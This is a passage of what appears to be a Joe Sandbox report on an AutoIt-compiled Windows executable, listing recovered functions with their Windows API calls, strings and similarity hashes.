                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0098A34D
                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0098A36F
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0098A382
                                          • DestroyWindow.USER32(00000000), ref: 0098A3A4
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00900000,00000000), ref: 0098A3DB
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0098A3F4
                                          • GetDesktopWindow.USER32 ref: 0098A40D
                                          • GetWindowRect.USER32(00000000), ref: 0098A414
                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0098A42C
                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0098A444
                                            • Part of subcall function 009025DB: GetWindowLongW.USER32(?,000000EB), ref: 009025EC
                                          Strings
                                          Similarity
                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                          • String ID: 0$tooltips_class32
                                          • API String ID: 1297703922-3619404913
                                          • Opcode ID: 02fe58e7540f2bf34bc1b9136ee9a8b47c7a7a8ea4edd42e0e3d7f59b10f6d6c
                                          • Instruction ID: 703afaa598e33865ba59f6b8a9305dc004eb9c60fbd1785b8666851098f7b912
                                          • Opcode Fuzzy Hash: 02fe58e7540f2bf34bc1b9136ee9a8b47c7a7a8ea4edd42e0e3d7f59b10f6d6c
                                          • Instruction Fuzzy Hash: 78719870555204AFEB21DF28CC48F6A7BE9FB88304F04452EF9858B3B0D774A946DB62
                                          APIs
                                            • Part of subcall function 00902612: GetWindowLongW.USER32(?,000000EB), ref: 00902623
                                          • DragQueryPoint.SHELL32(?,?), ref: 0098C627
                                            • Part of subcall function 0098AB37: ClientToScreen.USER32(?,?), ref: 0098AB60
                                            • Part of subcall function 0098AB37: GetWindowRect.USER32(?,?), ref: 0098ABD6
                                            • Part of subcall function 0098AB37: PtInRect.USER32(?,?,0098C014), ref: 0098ABE6
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0098C690
                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0098C69B
                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0098C6BE
                                          • _wcscat.LIBCMT ref: 0098C6EE
                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0098C705
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0098C71E
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0098C735
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0098C757
                                          • DragFinish.SHELL32(?), ref: 0098C75E
                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0098C851
                                          Strings
                                          Similarity
                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                          • API String ID: 169749273-3440237614
                                          • Opcode ID: e47cf1e3d0adbbe162eaba90eb55c103ba2edac111979ab2ba559e429a7ff488
                                          • Instruction ID: 08e936cfeb576a8e15eeae24cc1cee65c88f2fe0d3015fdb30a841368576d5b6
                                          • Opcode Fuzzy Hash: e47cf1e3d0adbbe162eaba90eb55c103ba2edac111979ab2ba559e429a7ff488
                                          • Instruction Fuzzy Hash: 19617C71518305AFC701EF64CC95EAFBBE8EFC9714F00092EF595962A1DB30A949CB62
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 00984424
                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0098446F
                                          Strings
                                          Similarity
                                          • API ID: BuffCharMessageSendUpper
                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                          • API String ID: 3974292440-4258414348
                                          • Opcode ID: 1d97eaa975f1954a844ef278983d981aded5b6d5b1eaee432a2125ca4a387043
                                          • Instruction ID: d76de2859b50d0a9e18391142e2ff12e0ebbfd10219669001d0855c79e4e5d89
                                          • Opcode Fuzzy Hash: 1d97eaa975f1954a844ef278983d981aded5b6d5b1eaee432a2125ca4a387043
                                          • Instruction Fuzzy Hash: 459136702047129FCB14EF20C891B6EB7E5AF95354F458868F8965B3A2DB35ED0ACB81
                                          APIs
                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0098B8B4
                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,009891C2), ref: 0098B910
                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0098B949
                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0098B98C
                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0098B9C3
                                          • FreeLibrary.KERNEL32(?), ref: 0098B9CF
                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0098B9DF
                                          • DestroyIcon.USER32(?,?,?,?,?,009891C2), ref: 0098B9EE
                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0098BA0B
                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0098BA17
                                            • Part of subcall function 00922EFD: __wcsicmp_l.LIBCMT ref: 00922F86
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                          • String ID: .dll$.exe$.icl
                                          • API String ID: 1212759294-1154884017
                                          • Opcode ID: 16a3c1454f40cf1755aa9c5d4ff67e4cf571ea51bcfe1636d31b807fd9ee494d
                                          • Instruction ID: 5cf5024ad33ae5a87d1c148933ffc2e2a92f8194aecfadc33d3bde81efb6afaf
                                          • Opcode Fuzzy Hash: 16a3c1454f40cf1755aa9c5d4ff67e4cf571ea51bcfe1636d31b807fd9ee494d
                                          • Instruction Fuzzy Hash: 9C610F71900219BEEB14EF64DC41FBE7BACEB08724F108516FE15D62D1DB75A980EBA0
                                          APIs
                                          • GetLocalTime.KERNEL32(?), ref: 0096DCDC
                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 0096DCEC
                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0096DCF8
                                          • __wsplitpath.LIBCMT ref: 0096DD56
                                          • _wcscat.LIBCMT ref: 0096DD6E
                                          • _wcscat.LIBCMT ref: 0096DD80
                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0096DD95
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0096DDA9
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0096DDDB
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0096DDFC
                                          • _wcscpy.LIBCMT ref: 0096DE08
                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0096DE47
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                          • String ID: *.*
                                          • API String ID: 3566783562-438819550
                                          • Opcode ID: 9682069299df2cb9154ce47cd900a6b5f4fccb64d47572e793ad48b8548205a4
                                          • Instruction ID: 83d68ceb964e62247289fba1485df1881030301572900612923c3962d67a4ea7
                                          • Opcode Fuzzy Hash: 9682069299df2cb9154ce47cd900a6b5f4fccb64d47572e793ad48b8548205a4
                                          • Instruction Fuzzy Hash: 9D615C726042059FCB10EF60C854AAEB7E8FFC9314F04891EF999D7251DB35E945CB92
                                          APIs
                                          • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00969C7F
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00969CA0
                                          • __swprintf.LIBCMT ref: 00969CF9
                                          • __swprintf.LIBCMT ref: 00969D12
                                          • _wprintf.LIBCMT ref: 00969DB9
                                          • _wprintf.LIBCMT ref: 00969DD7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                          • API String ID: 311963372-3080491070
                                          • Opcode ID: acbabc42fa9ea9655e02e305aa76f077a8ce6ca355d1a6c7313020f1a4c65daa
                                          • Instruction ID: 99f05e3e3768a1f495b3ac479a36690438ae88036252db8caa30ff0cba253293
                                          • Opcode Fuzzy Hash: acbabc42fa9ea9655e02e305aa76f077a8ce6ca355d1a6c7313020f1a4c65daa
                                          • Instruction Fuzzy Hash: B4518832D00609AECF14EBE0DE56EEEB77CAF48314F600065B519721A2EB312E59DB61
                                          APIs
                                            • Part of subcall function 00909837: __itow.LIBCMT ref: 00909862
                                            • Part of subcall function 00909837: __swprintf.LIBCMT ref: 009098AC
                                          • CharLowerBuffW.USER32(?,?), ref: 0096A3CB
                                          • GetDriveTypeW.KERNEL32 ref: 0096A418
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0096A460
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0096A497
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0096A4C5
                                            • Part of subcall function 00907BCC: _memmove.LIBCMT ref: 00907C06
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                          • API String ID: 2698844021-4113822522
                                          • Opcode ID: 1d3ed09fb1ae3e01c8329efed21175fe7139e66583c247edc03d4bbabf794338
                                          • Instruction ID: 2903d29ad950294fd3fbd99ab75314c5ec667120a89994d6376ea5f9901bd667
                                          • Opcode Fuzzy Hash: 1d3ed09fb1ae3e01c8329efed21175fe7139e66583c247edc03d4bbabf794338
                                          • Instruction Fuzzy Hash: 54511C715183059FC700EF10C99196BB7E8EF98728F50896DF89A672A2DB31ED09CF52
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0093E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0095F8DF
                                          • LoadStringW.USER32(00000000,?,0093E029,00000001), ref: 0095F8E8
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                          • GetModuleHandleW.KERNEL32(00000000,009C5310,?,00000FFF,?,?,0093E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0095F90A
                                          • LoadStringW.USER32(00000000,?,0093E029,00000001), ref: 0095F90D
                                          • __swprintf.LIBCMT ref: 0095F95D
                                          • __swprintf.LIBCMT ref: 0095F96E
                                          • _wprintf.LIBCMT ref: 0095FA17
                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0095FA2E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                          • API String ID: 984253442-2268648507
                                          • Opcode ID: 980baa869aea581e4120709758b1799f5a3d0563d92d690c7c2d787cf244b5c7
                                          • Instruction ID: 030fb2ea21298e3e2c7938c3227e0b795fcd3b98508569541e3055a51a116123
                                          • Opcode Fuzzy Hash: 980baa869aea581e4120709758b1799f5a3d0563d92d690c7c2d787cf244b5c7
                                          • Instruction Fuzzy Hash: B4412A72C04119AECF04FBE0DD96EEEB778AF98321F500465B605B21D1EA356F09CB61
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00989207,?,?), ref: 0098BA56
                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00989207,?,?,00000000,?), ref: 0098BA6D
                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00989207,?,?,00000000,?), ref: 0098BA78
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00989207,?,?,00000000,?), ref: 0098BA85
                                          • GlobalLock.KERNEL32(00000000), ref: 0098BA8E
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00989207,?,?,00000000,?), ref: 0098BA9D
                                          • GlobalUnlock.KERNEL32(00000000), ref: 0098BAA6
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00989207,?,?,00000000,?), ref: 0098BAAD
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00989207,?,?,00000000,?), ref: 0098BABE
                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00992CAC,?), ref: 0098BAD7
                                          • GlobalFree.KERNEL32(00000000), ref: 0098BAE7
                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 0098BB0B
                                          • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0098BB36
                                          • DeleteObject.GDI32(00000000), ref: 0098BB5E
                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0098BB74
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                          • String ID:
                                          • API String ID: 3840717409-0
                                          • Opcode ID: 738760c31e9598b7f8c4b61388186917b7308d632a53c816ed1ad0fb67ec6af2
                                          • Instruction ID: 792af69533eb46c307903ac7822f14c0d93faab5eb4c8b08f9f5a87e42cf4199
                                          • Opcode Fuzzy Hash: 738760c31e9598b7f8c4b61388186917b7308d632a53c816ed1ad0fb67ec6af2
                                          • Instruction Fuzzy Hash: 42412675614208EFDB21AF65DC98EAABBBCFB89711F144069F906D7360D7309E01EB60
                                          APIs
                                          • __wsplitpath.LIBCMT ref: 0096DA10
                                          • _wcscat.LIBCMT ref: 0096DA28
                                          • _wcscat.LIBCMT ref: 0096DA3A
                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0096DA4F
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0096DA63
                                          • GetFileAttributesW.KERNEL32(?), ref: 0096DA7B
                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 0096DA95
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0096DAA7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                          • String ID: *.*
                                          • API String ID: 34673085-438819550
                                          • Opcode ID: 7f830acc4a6acb3ca2b1708464166dc9a26731e1aa37409277749177e689154e
                                          • Instruction ID: e56d601fab2919f5c01911480de30b92dd0ebaf4c26c79439fa546301da53bb9
                                          • Opcode Fuzzy Hash: 7f830acc4a6acb3ca2b1708464166dc9a26731e1aa37409277749177e689154e
                                          • Instruction Fuzzy Hash: 6F818571A0A3419FCB24DF64C844A6AB7E8BF89350F188C2EF899CB251D734DD45CB52
                                          APIs
                                            • Part of subcall function 00902612: GetWindowLongW.USER32(?,000000EB), ref: 00902623
                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0098C1FC
                                          • GetFocus.USER32 ref: 0098C20C
                                          • GetDlgCtrlID.USER32(00000000), ref: 0098C217
                                          • _memset.LIBCMT ref: 0098C342
                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0098C36D
                                          • GetMenuItemCount.USER32(?), ref: 0098C38D
                                          • GetMenuItemID.USER32(?,00000000), ref: 0098C3A0
                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0098C3D4
                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0098C41C
                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0098C454
                                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0098C489
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                          • String ID: 0
                                          • API String ID: 1296962147-4108050209
                                          • Opcode ID: f9ca78725c73e28924bf255982e5c49124c06d0ea03adbdfb04964d7748e1fa9
                                          • Instruction ID: d4af68ad64a836a08136c73f20ce6cbf499e77e9b9e44295cccef0d2cf463de4
                                          • Opcode Fuzzy Hash: f9ca78725c73e28924bf255982e5c49124c06d0ea03adbdfb04964d7748e1fa9
                                          • Instruction Fuzzy Hash: 2E818BB0608301AFD710EF24D894A7BBBE8FB88714F00492EF995973A1D770D945DB62
                                          APIs
                                          • GetDC.USER32(00000000), ref: 0097738F
                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0097739B
                                          • CreateCompatibleDC.GDI32(?), ref: 009773A7
                                          • SelectObject.GDI32(00000000,?), ref: 009773B4
                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00977408
                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00977444
                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00977468
                                          • SelectObject.GDI32(00000006,?), ref: 00977470
                                          • DeleteObject.GDI32(?), ref: 00977479
                                          • DeleteDC.GDI32(00000006), ref: 00977480
                                          • ReleaseDC.USER32(00000000,?), ref: 0097748B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                          • String ID: (
                                          • API String ID: 2598888154-3887548279
                                          • Opcode ID: 1c7c2576b68dda8058ebb134bee8438d6daf2135c51e3b0c6014b4c80908f037
                                          • Instruction ID: 5bbcf44253daa671debd310b46ec3cc2ef628b9725a6b9267ac5b977fad4f9d1
                                          • Opcode Fuzzy Hash: 1c7c2576b68dda8058ebb134bee8438d6daf2135c51e3b0c6014b4c80908f037
                                          • Instruction Fuzzy Hash: F5514776904309EFCB14CFA8DC85EAEBBB9EF48310F148529F95AA7351D731A940DB50
                                          APIs
                                            • Part of subcall function 00920957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00906B0C,?,00008000), ref: 00920973
                                            • Part of subcall function 00904750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00904743,?,?,009037AE,?), ref: 00904770
                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00906BAD
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00906CFA
                                            • Part of subcall function 0090586D: _wcscpy.LIBCMT ref: 009058A5
                                            • Part of subcall function 0092363D: _iswctype.LIBCMT ref: 00923645
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                          • API String ID: 537147316-1018226102
                                          • Opcode ID: ac63a4c0464bd4a42ff39a59db37c2e926041a5d70c41ef6f9554fd1ac750768
                                          • Instruction ID: e34172824b159822576cf862a30e7f23b373130f4a6a5f10b8b3e0387b14c708
                                          • Opcode Fuzzy Hash: ac63a4c0464bd4a42ff39a59db37c2e926041a5d70c41ef6f9554fd1ac750768
                                          • Instruction Fuzzy Hash: 86027A705083419FC724EF24C891AAFBBE9AFD9314F14481DF59A972E2DB30E949CB52
                                          APIs
                                          • _memset.LIBCMT ref: 00962D50
                                          • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00962DDD
                                          • GetMenuItemCount.USER32(009C5890), ref: 00962E66
                                          • DeleteMenu.USER32(009C5890,00000005,00000000,000000F5,?,?), ref: 00962EF6
                                          • DeleteMenu.USER32(009C5890,00000004,00000000), ref: 00962EFE
                                          • DeleteMenu.USER32(009C5890,00000006,00000000), ref: 00962F06
                                          • DeleteMenu.USER32(009C5890,00000003,00000000), ref: 00962F0E
                                          • GetMenuItemCount.USER32(009C5890), ref: 00962F16
                                          • SetMenuItemInfoW.USER32(009C5890,00000004,00000000,00000030), ref: 00962F4C
                                          • GetCursorPos.USER32(?), ref: 00962F56
                                          • SetForegroundWindow.USER32(00000000), ref: 00962F5F
                                          • TrackPopupMenuEx.USER32(009C5890,00000000,?,00000000,00000000,00000000), ref: 00962F72
                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00962F7E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                          • String ID:
                                          • API String ID: 3993528054-0
                                          • Opcode ID: f3a6f7cd4b5808dd89296caf99e9cc9ef9e7cc5336e0ab7d6ca17e01add9473e
                                          • Instruction ID: 3328c86ede89f4be5108f3e9f9f8a6b93fc4cc2fa3dcaf282e8cbae6d9d06b7f
                                          • Opcode Fuzzy Hash: f3a6f7cd4b5808dd89296caf99e9cc9ef9e7cc5336e0ab7d6ca17e01add9473e
                                          • Instruction Fuzzy Hash: 4D714B70605A05BFFB229F54DC59FAABF68FF44364F100226F625AA1E0C7766C60DB90
                                          APIs
                                            • Part of subcall function 00907BCC: _memmove.LIBCMT ref: 00907C06
                                          • _memset.LIBCMT ref: 0095786B
                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009578A0
